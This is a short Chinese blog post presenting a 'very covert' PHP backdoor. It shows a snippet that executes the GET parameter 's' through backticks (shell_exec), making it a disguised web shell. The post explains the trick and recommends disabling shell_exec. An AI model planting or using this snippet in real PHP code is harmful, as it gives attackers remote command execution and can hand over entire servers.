一个极其隐蔽的PHP后门写法

下面这段代码发现了什么,感觉好像没什么别的东西吧 就是打印个字符串而已~

$safe = $_GET['s'];
if (isset($safe)){
    echo `$safe`;
}

其实不然,其实我也是刚知道的,反撇号不同于单引号,长相不错,不过功能大相径庭。
单引号'就是个简单字符串
反撇号`确实一个函数的简化,而那个函数shell_exec都知道是干嘛的吧。
也就一个小马而已,最多拿个shell而已,带走整个服务器,没什么大不了。
很机智的一个后门,绝逼看不出来~反正我第一眼没发现什么
所以,如果没什么大用shell_exec函数还是禁止吧,一般没卵用。
本函数仅供学习。

人已赞赏
源码分享

代码实现输入密码才能浏览网页

2017-2-9 15:30:13

源码分享

苹果maccms V8播放地址AES加密

2017-12-16 23:21:40

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索